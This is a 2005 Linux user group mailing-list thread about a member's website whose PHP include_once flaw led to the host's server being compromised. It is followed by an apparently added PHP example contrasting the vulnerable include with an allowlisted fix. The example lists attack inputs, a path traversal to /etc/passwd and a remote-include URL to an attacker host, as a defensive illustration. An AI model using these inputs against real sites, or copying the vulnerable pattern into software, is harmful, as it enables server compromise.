[wlug_org] New website/website host required
Centurion Computer Technology Ltd
wlug_org@lists.wellylug.org.nz
Sat, 18 Jun 2005 12:12:03 +1200
Jethro,
Send me a copy of your code and I will look it over.
On Fri, 2005-06-17 at 16:57 +1200, Jethro Carr wrote:
> ohh s**t....
>
> First off, really sorry to Ewen for this.
>
> The problem is the /admin folder which was written a long time ago and
> should have been deleted. I can really make no excuses for not doing
> this. A change in the website structure caused this to break and I never
> checked it.
>
>
> The first problem Ewen mentions was a problem with my
> include_once($variable) statement, when I first started programming with
> PHP, I didn't realise that I needed to check for other webpages being
> inserted into the $variable value. This caused Ewen's server to be
> compromised. :-(
>
>
> > A brief look at the database, and the rest of the code leaves me feeling
> > that a considerable amount of work would be required before I felt it
> > was "safe" to run on my webservers.
>
> Ewen, if you would be kind enough to mention (to me) a couple of things
> to look at, I would be grateful. I'm not aware of any major flaws, so I
> would like to know if there are.
>
>
>
> > Hence the options are either
> > (a) converting it to a static-only website,
>
> I, or someone else can do this.
>
> > or (b) moving it somewhere else.
>
> Anyone who wants to, please inform the list.
>
>
> > PS: "Fixing it up" and then running it on my webservers is no longer an
> > option. We tried that after the first exploit.
>
> I understand your stand completely Ewen, and I'm really sorry for this.
>
>
>
> I'm also happy to opensource the code to anyone to take a look at.
>
>
>
--
Daniel Reurich
Centurion Computer Technology (2005) Limited
Ph: (04) 565 1832
Mobile: (021) 797 722
email: daniel@centurion.net.nz
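The include_once($variable) flaw Jethro describes above is the classic PHP file-inclusion bug: a request parameter is handed straight to include_once, so whoever controls the parameter chooses which file (local, or remote where the server permits URL includes) gets executed as PHP. The following is an added example written for this archive, not the WLUG site's own code; the pages/ directory, the page names and the ?page= parameter are assumed. It shows the vulnerable pattern next to an allowlisted replacement.

```php
<?php
// Added example: vulnerable include_once($variable) beside a hardened form.
// Not the WLUG site's code. The pages/ layout, the page names and the
// ?page= query parameter are assumptions made for this illustration.

// VULNERABLE: the file name comes straight from the request. A request such
// as ?page=../../../etc/passwd reads an arbitrary local file, and on a server
// that permits URL includes (allow_url_fopen on PHP 4/5.1, allow_url_include
// from PHP 5.2) ?page=http://attacker.example/shell.txt fetches and executes
// attacker-supplied PHP, which is how a web server gets compromised this way.
function load_page_vulnerable(string $page): void
{
    include_once($page);
}

// HARDENED: the request value is only ever used as a key into a fixed
// allowlist. The string the user sent never reaches include_once; only a
// path the site author wrote does.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'meeting' => 'pages/meeting.php',
];

// Returns the allowlisted path for $page, or the home page for anything
// missing, malformed or unknown. The regex rejects slashes, dots, NUL bytes
// and URL schemes before the lookup is even attempted.
function resolve_page(?string $page): string
{
    if ($page === null || !preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return PAGES['home'];
    }
    return PAGES[$page] ?? PAGES['home'];
}

function load_page_hardened(?string $page): void
{
    include_once(resolve_page($page));
}

// Show what each sample request value resolves to. The attacker strings are
// constructed for the example and all collapse to the home page.
$samples = [
    'about',
    'meeting',
    '../../../etc/passwd',
    'http://attacker.example/shell.txt',
    "about\0.txt",
    null,
];
foreach ($samples as $value) {
    printf("%-40s -> %s\n", var_export($value, true), resolve_page($value));
}

// At the top of the assumed index.php, e.g. index.php?page=about:
// load_page_hardened($_GET['page'] ?? null);
```

The point of the allowlist is that validation alone (rejecting "..", stripping "http://") keeps chasing encodings; mapping to a fixed set of author-written paths removes the attacker-controlled string from the include entirely. The same approach applies to any /admin-style directory: if it is not meant to be reachable, delete it rather than rely on nobody finding it.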